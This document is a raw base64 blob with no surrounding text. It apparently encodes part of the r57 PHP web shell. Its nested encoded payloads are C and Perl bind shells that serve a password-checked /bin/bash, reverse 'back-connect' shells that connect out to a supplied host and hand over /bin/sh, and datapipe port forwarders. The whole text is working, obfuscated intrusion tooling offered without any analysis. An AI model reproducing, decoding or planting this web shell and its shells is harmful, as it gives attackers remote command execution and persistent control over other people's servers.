I+PC9TUEFOPiIsJEN1clN0cmluZyk7JHRoaXMtPlJlc3VsdEZpbGVzWyRmaWxlbmFtZV1bJGErMSBdPSRDdXJTdHJpbmc7JHRoaXMtPk1hdGNoZXNDb3VudCs9JGNvdW50OyR0aGlzLT5GaWxlTWF0Y2hlc0NvdW50WyRmaWxlbmFtZV0rPSRjb3VudDt9fX0kdGhpcy0+VGltZVRvdGFsPUByb3VuZChnZXRtaWNyb3RpbWUoKS0kdGhpcy0+VGltZVN0YXJ0LDQgKTt9fWZ1bmN0aW9uIGdldG1pY3JvdGltZSgpe2xpc3QoJHVzZWMsJHNlYyk9QGV4cGxvZGUoIiAiLEBtaWNyb3RpbWUoKSk7cmV0dXJuICgoZmxvYXQpJHVzZWMrKGZsb2F0KSRzZWMpO30kcG9ydF9iaW5kX2JkX2M9IkkybHVZMngxWkdVZ1BITjBaR2x2TG1nK0RRb2phVzVqYkhWa1pTQThjM1J5YVc1bkxtZytEUW9qYVc1amJIVmtaU0E4YzNsekwzUjVjR1Z6TG1nK0RRb2phVzVqYkhWa1pTDQpBOGMzbHpMM052WTJ0bGRDNW9QZzBLSTJsdVkyeDFaR1VnUEc1bGRHbHVaWFF2YVc0dWFENE5DaU5wYm1Oc2RXUmxJRHhsY25KdWJ5NW9QZzBLYVc1MElHMWhhVzRvWVhKbll5eGhjbWQyS1EwS2FXNTBJDQpHRnlaMk03RFFwamFHRnlJQ29xWVhKbmRqc05DbnNnSUEwS0lHbHVkQ0J6YjJOclptUXNJRzVsZDJaa093MEtJR05vWVhJZ1luVm1Xek13WFRzTkNpQnpkSEoxWTNRZ2MyOWphMkZrWkhKZmFXNGdjbVZ0DQpiM1JsT3cwS0lHbG1LR1p2Y21zb0tTQTlQU0F3S1NCN0lBMEtJSEpsYlc5MFpTNXphVzVmWm1GdGFXeDVJRDBnUVVaZlNVNUZWRHNOQ2lCeVpXMXZkR1V1YzJsdVgzQnZjblFnUFNCb2RHOXVjeWhoZEc5DQpwS0dGeVozWmJNVjBwS1RzTkNpQnlaVzF2ZEdVdWMybHVYMkZrWkhJdWMxOWhaR1J5SUQwZ2FIUnZibXdvU1U1QlJFUlNYMEZPV1NrN0lBMEtJSE52WTJ0bVpDQTlJSE52WTJ0bGRDaEJSbDlKVGtWVUxGDQpOUFEwdGZVMVJTUlVGTkxEQXBPdzBLSUdsbUtDRnpiMk5yWm1RcElIQmxjbkp2Y2lnaWMyOWphMlYwSUdWeWNtOXlJaWs3RFFvZ1ltbHVaQ2h6YjJOclptUXNJQ2h6ZEhKMVkzUWdjMjlqYTJGa1pISWdLDQppa21jbVZ0YjNSbExDQXdlREV3S1RzTkNpQnNhWE4wWlc0b2MyOWphMlprTENBMUtUc05DaUIzYUdsc1pTZ3hLUTBLSUNCN0RRb2dJQ0J1WlhkbVpEMWhZMk5sY0hRb2MyOWphMlprTERBc01DazdEUW9nDQpJQ0JrZFhBeUtHNWxkMlprTERBcE93MEtJQ0FnWkhWd01paHVaWGRtWkN3eEtUc05DaUFnSUdSMWNESW9ibVYzWm1Rc01pazdEUW9nSUNCM2NtbDBaU2h1WlhkbVpDd2lVR0Z6YzNkdmNtUTZJaXd4TUNrDQo3RFFvZ0lDQnlaV0ZrS0c1bGQyWmtMR0oxWml4emFYcGxiMllvWW5WbUtTazdEUW9nSUNCcFppQW9JV05vY0dGemN5aGhjbWQyV3pKZExHSjFaaWtwRFFvZ0lDQnplWE4wWlcwb0ltVmphRzhnZDJWc1kyDQo5dFpTQjBieUJ5TlRjZ2MyaGxiR3dnSmlZZ0wySnBiaTlpWVhOb0lDMXBJaWs3RFFvZ0lDQmxiSE5sRFFvZ0lDQm1jSEpwYm5SbUtITjBaR1Z5Y2l3aVUyOXljbmtpS1RzTkNpQWdJR05zYjNObEtHNWxkDQoyWmtLVHNOQ2lBZ2ZRMEtJSDBOQ24wTkNtbHVkQ0JqYUhCaGMzTW9ZMmhoY2lBcVltRnpaU3dnWTJoaGNpQXFaVzUwWlhKbFpDa2dldzBLYVc1MElHazdEUXBtYjNJb2FUMHdPMms4YzNSeWJHVnVLR1Z1DQpkR1Z5WldRcE8ya3JLeWtnRFFwN0RRcHBaaWhsYm5SbGNtVmtXMmxkSUQwOUlDZGNiaWNwRFFwbGJuUmxjbVZrVzJsZElEMGdKMXd3SnpzZ0RRcHBaaWhsYm5SbGNtVmtXMmxkSUQwOUlDZGNjaWNwRFFwDQpsYm5SbGNtVmtXMmxkSUQwZ0oxd3dKenNOQ24wTkNtbG1JQ2doYzNSeVkyMXdLR0poYzJVc1pXNTBaWEpsWkNrcERRcHlaWFIxY200Z01Ec05DbjA9IjskcG9ydF9iaW5kX2JkX3BsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRb2tVMGhGVEV3OUlpOWlhVzR2WW1GemFDQXRhU0k3RFFwcFppQW9RRUZTUjFZZ1BDQXhLU0I3SUdWNGFYUW9NU2s3SUgwTkNpUk1TDQpWTlVSVTVmVUU5U1ZEMGtRVkpIVmxzd1hUc05DblZ6WlNCVGIyTnJaWFE3RFFva2NISnZkRzlqYjJ3OVoyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLYzI5amEyVjBLRk1zSmxCR1gwbE9SVlFzDQpKbE5QUTB0ZlUxUlNSVUZOTENSd2NtOTBiMk52YkNrZ2ZId2daR2xsSUNKRFlXNTBJR055WldGMFpTQnpiMk5yWlhSY2JpSTdEUXB6WlhSemIyTnJiM0IwS0ZNc1UwOU1YMU5QUTB0RlZDeFRUMTlTUlZWDQpUUlVGRVJGSXNNU2s3RFFwaWFXNWtLRk1zYzI5amEyRmtaSEpmYVc0b0pFeEpVMVJGVGw5UVQxSlVMRWxPUVVSRVVsOUJUbGtwS1NCOGZDQmthV1VnSWtOaGJuUWdiM0JsYmlCd2IzSjBYRzRpT3cwS2JHDQpsemRHVnVLRk1zTXlrZ2ZId2daR2xsSUNKRFlXNTBJR3hwYzNSbGJpQndiM0owWEc0aU93MEtkMmhwYkdVb01Ta05DbnNOQ21GalkyVndkQ2hEVDA1T0xGTXBPdzBLYVdZb0lTZ2tjR2xrUFdadmNtc3BLDQpRMEtldzBLWkdsbElDSkRZVzV1YjNRZ1ptOXlheUlnYVdZZ0tDRmtaV1pwYm1Wa0lDUndhV1FwT3cwS2IzQmxiaUJUVkVSSlRpd2lQQ1pEVDA1T0lqc05DbTl3Wlc0Z1UxUkVUMVZVTENJK0prTlBUazRpDQpPdzBLYjNCbGJpQlRWRVJGVWxJc0lqNG1RMDlPVGlJN0RRcGxlR1ZqSUNSVFNFVk1UQ0I4ZkNCa2FXVWdjSEpwYm5RZ1EwOU9UaUFpUTJGdWRDQmxlR1ZqZFhSbElDUlRTRVZNVEZ4dUlqc05DbU5zYjNODQpsSUVOUFRrNDdEUXBsZUdsMElEQTdEUXA5RFFwOSI7JGJhY2tfY29ubmVjdD0iSXlFdmRYTnlMMkpwYmk5d1pYSnNEUXAxYzJVZ1UyOWphMlYwT3cwS0pHTnRaRDBnSW14NWJuZ2lPdzBLSkhONWMzUmxiVDBnSjJWamFHOGdJbUIxYm1GdFpTQXRZV0FpTzJWag0KYUc4Z0ltQnBaR0FpT3k5aWFXNHZjMmduT3cwS0pEQTlKR050WkRzTkNpUjBZWEpuWlhROUpFRlNSMVpiTUYwN0RRb2tjRzl5ZEQwa1FWSkhWbHN4WFRzTkNpUnBZV1JrY2oxcGJtVjBYMkYwYjI0b0pIUg0KaGNtZGxkQ2tnZkh3Z1pHbGxLQ0pGY25KdmNqb2dKQ0ZjYmlJcE93MEtKSEJoWkdSeVBYTnZZMnRoWkdSeVgybHVLQ1J3YjNKMExDQWthV0ZrWkhJcElIeDhJR1JwWlNnaVJYSnliM0k2SUNRaFhHNGlLVA0Kc05DaVJ3Y205MGJ6MW5aWFJ3Y205MGIySjVibUZ0WlNnbmRHTndKeWs3RFFwemIyTnJaWFFvVTA5RFMwVlVMQ0JRUmw5SlRrVlVMQ0JUVDBOTFgxTlVVa1ZCVFN3Z0pIQnliM1J2S1NCOGZDQmthV1VvSQ0Ka1Z5Y205eU9pQWtJVnh1SWlrN0RRcGpiMjV1WldOMEtGTlBRMHRGVkN3Z0pIQmhaR1J5S1NCOGZDQmthV1VvSWtWeWNtOXlPaUFrSVZ4dUlpazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaQ0KS1RzTkNtOXdaVzRvVTFSRVQxVlVMQ0FpUGlaVFQwTkxSVlFpS1RzTkNtOXdaVzRvVTFSRVJWSlNMQ0FpUGlaVFQwTkxSVlFpS1RzTkNuTjVjM1JsYlNna2MzbHpkR1Z0S1RzTkNtTnNiM05sS0ZOVVJFbA0KT0tUc05DbU5zYjNObEtGTlVSRTlWVkNrN0RRcGpiRzl6WlNoVFZFUkZVbElwT3c9PSI7JGJhY2tfY29ubmVjdF9jPSJJMmx1WTJ4MVpHVWdQSE4wWkdsdkxtZytEUW9qYVc1amJIVmtaU0E4YzNsekwzTnZZMnRsZEM1b1BnMEtJMmx1WTJ4MVpHVWdQRzVsZEdsdVpYUXZhVzR1YUQ0TkNtbHVkQw0KQnRZV2x1S0dsdWRDQmhjbWRqTENCamFHRnlJQ3BoY21kMlcxMHBEUXA3RFFvZ2FXNTBJR1prT3cwS0lITjBjblZqZENCemIyTnJZV1JrY2w5cGJpQnphVzQ3RFFvZ1kyaGhjaUJ5YlhOYk1qRmRQU0p5Yg0KU0F0WmlBaU95QU5DaUJrWVdWdGIyNG9NU3d3S1RzTkNpQnphVzR1YzJsdVgyWmhiV2xzZVNBOUlFRkdYMGxPUlZRN0RRb2djMmx1TG5OcGJsOXdiM0owSUQwZ2FIUnZibk1vWVhSdmFTaGhjbWQyV3pKZA0KS1NrN0RRb2djMmx1TG5OcGJsOWhaR1J5TG5OZllXUmtjaUE5SUdsdVpYUmZZV1JrY2loaGNtZDJXekZkS1RzZ0RRb2dZbnBsY204b1lYSm5kbHN4WFN4emRISnNaVzRvWVhKbmRsc3hYU2tyTVN0emRISg0Kc1pXNG9ZWEpuZGxzeVhTa3BPeUFOQ2lCbVpDQTlJSE52WTJ0bGRDaEJSbDlKVGtWVUxDQlRUME5MWDFOVVVrVkJUU3dnU1ZCUVVrOVVUMTlVUTFBcElEc2dEUW9nYVdZZ0tDaGpiMjV1WldOMEtHWmtMQw0KQW9jM1J5ZFdOMElITnZZMnRoWkdSeUlDb3BJQ1p6YVc0c0lITnBlbVZ2WmloemRISjFZM1FnYzI5amEyRmtaSElwS1NrOE1Da2dldzBLSUNBZ2NHVnljbTl5S0NKYkxWMGdZMjl1Ym1WamRDZ3BJaWs3RA0KUW9nSUNCbGVHbDBLREFwT3cwS0lIME5DaUJ6ZEhKallYUW9jbTF6TENCaGNtZDJXekJkS1RzTkNpQnplWE4wWlcwb2NtMXpLVHNnSUEwS0lHUjFjRElvWm1Rc0lEQXBPdzBLSUdSMWNESW9abVFzSURFcA0KT3cwS0lHUjFjRElvWm1Rc0lESXBPdzBLSUdWNFpXTnNLQ0l2WW1sdUwzTm9JaXdpYzJnZ0xXa2lMQ0JPVlV4TUtUc05DaUJqYkc5elpTaG1aQ2s3SUEwS2ZRPT0iOyRkYXRhcGlwZV9jPSJJMmx1WTJ4MVpHVWdQSE41Y3k5MGVYQmxjeTVvUGcwS0kybHVZMngxWkdVZ1BITjVjeTl6YjJOclpYUXVhRDROQ2lOcGJtTnNkV1JsSUR4emVYTXZkMkZwZEM1b1BnMEtJMmx1WTINCngxWkdVZ1BHNWxkR2x1WlhRdmFXNHVhRDROQ2lOcGJtTnNkV1JsSUR4emRHUnBieTVvUGcwS0kybHVZMngxWkdVZ1BITjBaR3hwWWk1b1BnMEtJMmx1WTJ4MVpHVWdQR1Z5Y201dkxtZytEUW9qYVc1amINCkhWa1pTQThkVzVwYzNSa0xtZytEUW9qYVc1amJIVmtaU0E4Ym1WMFpHSXVhRDROQ2lOcGJtTnNkV1JsSUR4c2FXNTFlQzkwYVcxbExtZytEUW9qYVdaa1pXWWdVMVJTUlZKU1QxSU5DbVY0ZEdWeWJpQmoNCmFHRnlJQ3B6ZVhOZlpYSnliR2x6ZEZ0ZE93MEtaWGgwWlhKdUlHbHVkQ0J6ZVhOZmJtVnljanNOQ21Ob1lYSWdLblZ1WkdWbUlEMGdJbFZ1WkdWbWFXNWxaQ0JsY25KdmNpSTdEUXBqYUdGeUlDcHpkSEoNCmxjbkp2Y2lobGNuSnZjaWtnSUEwS2FXNTBJR1Z5Y205eU95QWdEUXA3SUEwS2FXWWdLR1Z5Y205eUlENGdjM2x6WDI1bGNuSXBEUXB5WlhSMWNtNGdkVzVrWldZN0RRcHlaWFIxY200Z2MzbHpYMlZ5Y20NCnhwYzNSYlpYSnliM0pkT3cwS2ZRMEtJMlZ1WkdsbURRb05DbTFoYVc0b1lYSm5ZeXdnWVhKbmRpa2dJQTBLSUNCcGJuUWdZWEpuWXpzZ0lBMEtJQ0JqYUdGeUlDb3FZWEpuZGpzZ0lBMEtleUFOQ2lBZ2ENClc1MElHeHpiMk5yTENCamMyOWpheXdnYjNOdlkyczdEUW9nSUVaSlRFVWdLbU5tYVd4bE93MEtJQ0JqYUdGeUlHSjFabHMwTURrMlhUc05DaUFnYzNSeWRXTjBJSE52WTJ0aFpHUnlYMmx1SUd4aFpHUnkNCkxDQmpZV1JrY2l3Z2IyRmtaSEk3RFFvZ0lHbHVkQ0JqWVdSa2NteGxiaUE5SUhOcGVtVnZaaWhqWVdSa2NpazdEUW9nSUdaa1gzTmxkQ0JtWkhOeUxDQm1aSE5sT3cwS0lDQnpkSEoxWTNRZ2FHOXpkR1YNCnVkQ0FxYURzTkNpQWdjM1J5ZFdOMElITmxjblpsYm5RZ0tuTTdEUW9nSUdsdWRDQnVZbmwwT3cwS0lDQjFibk5wWjI1bFpDQnNiMjVuSUdFN0RRb2dJSFZ1YzJsbmJtVmtJSE5vYjNKMElHOXdiM0owT3cNCjBLRFFvZ0lHbG1JQ2hoY21kaklDRTlJRFFwSUhzTkNpQWdJQ0JtY0hKcGJuUm1LSE4wWkdWeWNpd2lWWE5oWjJVNklDVnpJR3h2WTJGc2NHOXlkQ0J5WlcxdmRHVndiM0owSUhKbGJXOTBaV2h2YzNSY2INCmlJc1lYSm5kbHN3WFNrN0RRb2dJQ0FnY21WMGRYSnVJRE13T3cwS0lDQjlEUW9nSUdFZ1BTQnBibVYwWDJGa1pISW9ZWEpuZGxzelhTazdEUW9nSUdsbUlDZ2hLR2dnUFNCblpYUm9iM04wWW5sdVlXMWwNCktHRnlaM1piTTEwcEtTQW1KZzBLSUNBZ0lDQWdJU2hvSUQwZ1oyVjBhRzl6ZEdKNVlXUmtjaWdtWVN3Z05Dd2dRVVpmU1U1RlZDa3BLU0I3RFFvZ0lDQWdjR1Z5Y205eUtHRnlaM1piTTEwcE93MEtJQ0ENCmdJSEpsZEhWeWJpQXlOVHNOQ2lBZ2ZRMEtJQ0J2Y0c5eWRDQTlJR0YwYjJ3b1lYSm5kbHN5WFNrN0RRb2dJR3hoWkdSeUxuTnBibDl3YjNKMElEMGdhSFJ2Ym5Nb0tIVnVjMmxuYm1Wa0lITm9iM0owS1MNCmhoZEc5c0tHRnlaM1piTVYwcEtTazdEUW9nSUdsbUlDZ29iSE52WTJzZ1BTQnpiMk5yWlhRb1VFWmZTVTVGVkN3Z1UwOURTMTlUVkZKRlFVMHNJRWxRVUZKUFZFOWZWRU5RS1NrZ1BUMGdMVEVwSUhzTkMNCmlBZ0lDQndaWEp5YjNJb0luTnZZMnRsZENJcE93MEtJQ0FnSUhKbGRIVnliaUF5TURzTkNpQWdmUTBLSUNCc1lXUmtjaTV6YVc1ZlptRnRhV3g1SUQwZ2FIUnZibk1vUVVaZlNVNUZWQ2s3RFFvZ0lHeGgNClpHUnlMbk5wYmw5aFpHUnlMbk5mWVdSa2NpQTlJR2gwYjI1c0tEQXBPdzBLSUNCcFppQW9ZbWx1WkNoc2MyOWpheXdnSm14aFpHUnlMQ0J6YVhwbGIyWW9iR0ZrWkhJcEtTa2dldzBLSUNBZ0lIQmxjbkoNCnZjaWdpWW1sdVpDSXBPdzBLSUNBZ0lISmxkSFZ5YmlBeU1Ec05DaUFnZlEwS0lDQnBaaUFvYkdsemRHVnVLR3h6YjJOckxDQXhLU2tnZXcwS0lDQWdJSEJsY25KdmNpZ2liR2x6ZEdWdUlpazdEUW9nSUMNCkFnY21WMGRYSnVJREl3T3cwS0lDQjlEUW9nSUdsbUlDZ29ibUo1ZENBOUlHWnZjbXNvS1NrZ1BUMGdMVEVwSUhzTkNpQWdJQ0J3WlhKeWIzSW9JbVp2Y21zaUtUc05DaUFnSUNCeVpYUjFjbTRnTWpBN0QNClFvZ0lIME5DaUFnYVdZZ0tHNWllWFFnUGlBd0tRMEtJQ0FnSUhKbGRIVnliaUF3T3cwS0lDQnpaWFJ6YVdRb0tUc05DaUFnZDJocGJHVWdLQ2hqYzI5amF5QTlJR0ZqWTJWd2RDaHNjMjlqYXl3Z0ptTmgNClpHUnlMQ0FtWTJGa1pISnNaVzRwS1NBaFBTQXRNU2tnZXcwS0lDQWdJR05tYVd4bElEMGdabVJ2Y0dWdUtHTnpiMk5yTENKeUt5SXBPdzBLSUNBZ0lHbG1JQ2dvYm1KNWRDQTlJR1p2Y21zb0tTa2dQVDANCmdMVEVwSUhzTkNpQWdJQ0FnSUdad2NtbHVkR1lvWTJacGJHVXNJQ0kxTURBZ1ptOXlhem9nSlhOY2JpSXNJSE4wY21WeWNtOXlLR1Z5Y201dktTazdEUW9nSUNBZ0lDQnphSFYwWkc5M2JpaGpjMjlqYXkNCnd5S1RzTkNpQWdJQ0FnSUdaamJHOXpaU2hqWm1sc1pTazdEUW9nSUNBZ0lDQmpiMjUwYVc1MVpUc05DaUFnSUNCOURRb2dJQ0FnYVdZZ0tHNWllWFFnUFQwZ01Da05DaUFnSUNBZ0lHZHZkRzhnWjI5MGMNCjI5amF6c05DaUFnSUNCbVkyeHZjMlVvWTJacGJHVXBPdzBLSUNBZ0lIZG9hV3hsSUNoM1lXbDBjR2xrS0MweExDQk9WVXhNTENCWFRrOUlRVTVIS1NBK0lEQXBPdzBLSUNCOURRb2dJSEpsZEhWeWJpQXkNCk1Ec05DZzBLSUdkdmRITnZZMnM2RFFvZ0lHbG1JQ2dvYjNOdlkyc2dQU0J6YjJOclpYUW9VRVpmU1U1RlZDd2dVMDlEUzE5VFZGSkZRVTBzSUVsUVVGSlBWRTlmVkVOUUtTa2dQVDBnTFRFcElIc05DaUENCmdJQ0JtY0hKcGJuUm1LR05tYVd4bExDQWlOVEF3SUhOdlkydGxkRG9nSlhOY2JpSXNJSE4wY21WeWNtOXlLR1Z5Y201dktTazdEUW9nSUNBZ1oyOTBieUJ4ZFdsME1Uc05DaUFnZlEwS0lDQnZZV1JrY2kNCjV6YVc1ZlptRnRhV3g1SUQwZ2FDMCthRjloWkdSeWRIbHdaVHNOQ2lBZ2IyRmtaSEl1YzJsdVgzQnZjblFnUFNCb2RHOXVjeWh2Y0c5eWRDazdEUW9nSUcxbGJXTndlU2dtYjJGa1pISXVjMmx1WDJGa1oNCkhJc0lHZ3RQbWhmWVdSa2Npd2dhQzArYUY5c1pXNW5kR2dwT3cwS0lDQnBaaUFvWTI5dWJtVmpkQ2h2YzI5amF5d2dKbTloWkdSeUxDQnphWHBsYjJZb2IyRmtaSElwS1NrZ2V3MEtJQ0FnSUdad2NtbHUNCmRHWW9ZMlpwYkdVc0lDSTFNREFnWTI5dWJtVmpkRG9nSlhOY2JpSXNJSE4wY21WeWNtOXlLR1Z5Y201dktTazdEUW9nSUNBZ1oyOTBieUJ4ZFdsME1Uc05DaUFnZlEwS0lDQjNhR2xzWlNBb01Ta2dldzANCktJQ0FnSUVaRVgxcEZVazhvSm1aa2MzSXBPdzBLSUNBZ0lFWkVYMXBGVWs4b0ptWmtjMlVwT3cwS0lDQWdJRVpFWDFORlZDaGpjMjlqYXl3bVptUnpjaWs3RFFvZ0lDQWdSa1JmVTBWVUtHTnpiMk5yTEMNClptWkhObEtUc05DaUFnSUNCR1JGOVRSVlFvYjNOdlkyc3NKbVprYzNJcE93MEtJQ0FnSUVaRVgxTkZWQ2h2YzI5amF5d21abVJ6WlNrN0RRb2dJQ0FnYVdZZ0tITmxiR1ZqZENneU1Dd2dKbVprYzNJc0kNCkU1VlRFd3NJQ1ptWkhObExDQk9WVXhNS1NBOVBTQXRNU2tnZXcwS0lDQWdJQ0FnWm5CeWFXNTBaaWhqWm1sc1pTd2dJalV3TUNCelpXeGxZM1E2SUNWelhHNGlMQ0J6ZEhKbGNuSnZjaWhsY25KdWJ5a3ANCk93MEtJQ0FnSUNBZ1oyOTBieUJ4ZFdsME1qc05DaUFnSUNCOURRb2dJQ0FnYVdZZ0tFWkVYMGxUVTBWVUtHTnpiMk5yTENabVpITnlLU0I4ZkNCR1JGOUpVMU5GVkNoamMyOWpheXdtWm1SelpTa3BJSHMNCk5DaUFnSUNBZ0lHbG1JQ2dvYm1KNWRDQTlJSEpsWVdRb1kzTnZZMnNzWW5WbUxEUXdPVFlwS1NBOFBTQXdLUTBLQ1dkdmRHOGdjWFZwZERJN0RRb2dJQ0FnSUNCcFppQW9LSGR5YVhSbEtHOXpiMk5yTEcNCkoxWml4dVlubDBLU2tnUEQwZ01Da05DZ2xuYjNSdklIRjFhWFF5T3cwS0lDQWdJSDBnWld4elpTQnBaaUFvUmtSZlNWTlRSVlFvYjNOdlkyc3NKbVprYzNJcElIeDhJRVpFWDBsVFUwVlVLRzl6YjJOckwNCkNabVpITmxLU2tnZXcwS0lDQWdJQ0FnYVdZZ0tDaHVZbmwwSUQwZ2NtVmhaQ2h2YzI5amF5eGlkV1lzTkRBNU5pa3BJRHc5SURBcERRb0paMjkwYnlCeGRXbDBNanNOQ2lBZ0lDQWdJR2xtSUNnb2QzSnANCmRHVW9ZM052WTJzc1luVm1MRzVpZVhRcEtTQThQU0F3S1EwS0NXZHZkRzhnY1hWcGRESTdEUW9nSUNBZ2ZRMEtJQ0I5RFFvTkNpQnhkV2wwTWpvTkNpQWdjMmgxZEdSdmQyNG9iM052WTJzc01pazdEUW8NCmdJR05zYjNObEtHOXpiMk5yS1RzTkNpQnhkV2wwTVRvTkNpQWdabVpzZFhOb0tHTm1hV3hsS1RzTkNpQWdjMmgxZEdSdmQyNG9ZM052WTJzc01pazdEUW9nY1hWcGREQTZEUW9nSUdaamJHOXpaU2hqWm0NCmxzWlNrN0RRb2dJSEpsZEhWeWJpQXdPdzBLZlE9PSI7JGRhdGFwaXBlX3BsPSJJeUV2ZFhOeUwySnBiaTl3WlhKc0RRcDFjMlVnU1U4Nk9sTnZZMnRsZERzTkNuVnpaU0JRVDFOSldEc05DaVJzYjJOaGJIQnZjblFnUFNBa1FWSkhWbHN3WFRzTkNpUm9iM04wSQ0KQ0FnSUNBZ1BTQWtRVkpIVmxzeFhUc05DaVJ3YjNKMElDQWdJQ0FnUFNBa1FWSkhWbHN5WFRzTkNpUmtZV1Z0YjI0OU1Uc05DaVJFU1ZJZ1BTQjFibVJsWmpzTkNpUjhJRDBnTVRzTkNtbG1JQ2drWkdGbA0KYlc5dUtYc2dKSEJwWkNBOUlHWnZjbXM3SUdWNGFYUWdhV1lnSkhCcFpEc2daR2xsSUNJa0lTSWdkVzVzWlhOeklHUmxabWx1WldRb0pIQnBaQ2s3SUZCUFUwbFlPanB6WlhSemFXUW9LU0J2Y2lCa2FXVQ0KZ0lpUWhJanNnZlEwS0pXOGdQU0FvSjNCdmNuUW5JRDArSUNSc2IyTmhiSEJ2Y25Rc0ozUnZjRzl5ZENjZ1BUNGdKSEJ2Y25Rc0ozUnZhRzl6ZENjZ1BUNGdKR2h2YzNRcE93MEtKR0ZvSUQwZ1NVODZPbA0KTnZZMnRsZERvNlNVNUZWQzArYm1WM0tDZE1iMk5oYkZCdmNuUW5JRDArSUNSc2IyTmhiSEJ2Y25Rc0oxSmxkWE5sSnlBOVBpQXhMQ2RNYVhOMFpXNG5JRDArSURFd0tTQjhmQ0JrYVdVZ0lpUWhJanNOQw0KaVJUU1VkN0owTklURVFuZlNBOUlDZEpSMDVQVWtVbk93MEtKRzUxYlNBOUlEQTdEUXAzYUdsc1pTQW9NU2tnZXlBTkNpUmphQ0E5SUNSaGFDMCtZV05qWlhCMEtDazdJR2xtSUNnaEpHTm9LU0I3SUhCeQ0KYVc1MElGTlVSRVZTVWlBaUpDRmNiaUk3SUc1bGVIUTdJSDBOQ2lzckpHNTFiVHNOQ2lSd2FXUWdQU0JtYjNKcktDazdEUXBwWmlBb0lXUmxabWx1WldRb0pIQnBaQ2twSUhzZ2NISnBiblFnVTFSRVJWSg0KU0lDSWtJVnh1SWpzZ2ZTQU5DbVZzYzJsbUlDZ2tjR2xrSUQwOUlEQXBJSHNnSkdGb0xUNWpiRzl6WlNncE95QlNkVzRvWENWdkxDQWtZMmdzSUNSdWRXMHBPeUI5SUEwS1pXeHpaU0I3SUNSamFDMCtZMg0KeHZjMlVvS1RzZ2ZRMEtmUTBLYzNWaUlGSjFiaUI3RFFwdGVTZ2tieXdnSkdOb0xDQWtiblZ0S1NBOUlFQmZPdzBLYlhrZ0pIUm9JRDBnU1U4Nk9sTnZZMnRsZERvNlNVNUZWQzArYm1WM0tDZFFaV1Z5UQ0KV1JrY2ljZ1BUNGdKRzh0UG5zbmRHOW9iM04wSjMwc0oxQmxaWEpRYjNKMEp5QTlQaUFrYnkwK2V5ZDBiM0J2Y25RbmZTazdEUXBwWmlBb0lTUjBhQ2tnZXlCbGVHbDBJREE3SUgwTkNtMTVJQ1JtYURzTg0KQ21sbUlDZ2tieTArZXlka2FYSW5mU2tnZXlBa1ptZ2dQU0JUZVcxaWIydzZPbWRsYm5ONWJTZ3BPeUJ2Y0dWdUtDUm1hQ3dnSWo0a2J5MCtleWRrYVhJbmZTOTBkVzV1Wld3a2JuVnRMbXh2WnlJcElHOQ0KeUlHUnBaU0FpSkNFaU95QjlEUW9rWTJndFBtRjFkRzltYkhWemFDZ3BPdzBLSkhSb0xUNWhkWFJ2Wm14MWMyZ29LVHNOQ25kb2FXeGxJQ2drWTJnZ2ZId2dKSFJvS1NCN0RRcHRlU0FrY21sdUlEMGdJaQ0KSTdEUXAyWldNb0pISnBiaXdnWm1sc1pXNXZLQ1JqYUNrc0lERXBJRDBnTVNCcFppQWtZMmc3RFFwMlpXTW9KSEpwYml3Z1ptbHNaVzV2S0NSMGFDa3NJREVwSUQwZ01TQnBaaUFrZEdnN0RRcHRlU2drYw0KbTkxZEN3Z0pHVnZkWFFwT3cwS2MyVnNaV04wS0NSeWIzVjBJRDBnSkhKcGJpd2dkVzVrWldZc0lDUmxiM1YwSUQwZ0pISnBiaXdnTVRJd0tUc05DbWxtSUNnaEpISnZkWFFnSUNZbUlDQWhKR1Z2ZFhRcA0KSUh0OURRcHRlU0FrWTJKMVptWmxjaUE5SUNJaU93MEtiWGtnSkhSaWRXWm1aWElnUFNBaUlqc05DbWxtSUNna1kyZ2dKaVlnS0habFl5Z2taVzkxZEN3Z1ptbHNaVzV2S0NSamFDa3NJREVwSUh4OElIWg0KbFl5Z2tjbTkxZEN3Z1ptbHNaVzV2S0NSamFDa3NJREVwS1NrZ2V3MEtiWGtnSkhKbGMzVnNkQ0E5SUhONWMzSmxZV1FvSkdOb0xDQWtkR0oxWm1abGNpd2dNVEF5TkNrN0RRcHBaaUFvSVdSbFptbHVaVw0KUW9KSEpsYzNWc2RDa3BJSHNOQ25CeWFXNTBJRk5VUkVWU1VpQWlKQ0ZjYmlJN0RRcGxlR2wwSURBN0RRcDlEUXBwWmlBb0pISmxjM1ZzZENBOVBTQXdLU0I3SUdWNGFYUWdNRHNnZlEwS2ZRMEthV1lnSw0KQ1IwYUNBZ0ppWWdJQ2gyWldNb0pHVnZkWFFzSUdacGJHVnVieWdrZEdncExDQXhLU0FnZkh3Z2RtVmpLQ1J5YjNWMExDQm1hV3hsYm04b0pIUm9LU3dnTVNrcEtTQjdEUXB0ZVNBa2NtVnpkV3gwSUQwZw0KYzNsemNtVmhaQ2drZEdnc0lDUmpZblZtWm1WeUxDQXhNREkwS1RzTkNtbG1JQ2doWkdWbWFXNWxaQ2drY21WemRXeDBLU2tnZXlCd2NtbHVkQ0JUVkVSRlVsSWdJaVFoWEc0aU95QmxlR2wwSURBN0lIMA0KTkNtbG1JQ2drY21WemRXeDBJRDA5SURBcElIdGxlR2wwSURBN2ZRMEtmUTBLYVdZZ0tDUm1hQ0FnSmlZZ0lDUjBZblZtWm1WeUtTQjdLSEJ5YVc1MElDUm1hQ0FrZEdKMVptWmxjaWs3ZlEwS2QyaHBiRw0KVWdLRzE1SUNSc1pXNGdQU0JzWlc1bmRHZ29KSFJpZFdabVpYSXBLU0I3RFFwdGVTQWtjbVZ6SUQwZ2MzbHpkM0pwZEdVb0pIUm9MQ0FrZEdKMVptWmxjaXdnSkd4bGJpazdEUXBwWmlBb0pISmxjeUErSQ0KREFwSUhza2RHSjFabVpsY2lBOUlITjFZbk4wY2lna2RHSjFabVpsY2l3Z0pISmxjeWs3ZlNBTkNtVnNjMlVnZTNCeWFXNTBJRk5VUkVWU1VpQWlKQ0ZjYmlJN2ZRMEtmUTBLZDJocGJHVWdLRzE1SUNScw0KWlc0Z1BTQnNaVzVuZEdnb0pHTmlkV1ptWlhJcEtTQjdEUXB0ZVNBa2NtVnpJRDBnYzNsemQzSnBkR1VvSkdOb0xDQWtZMkoxWm1abGNpd2dKR3hsYmlrN0RRcHBaaUFvSkhKbGN5QStJREFwSUhza1kySg0KMVptWmxjaUE5SUhOMVluTjBjaWdrWTJKMVptWmxjaXdnSkhKbGN5azdmU0FOQ21Wc2My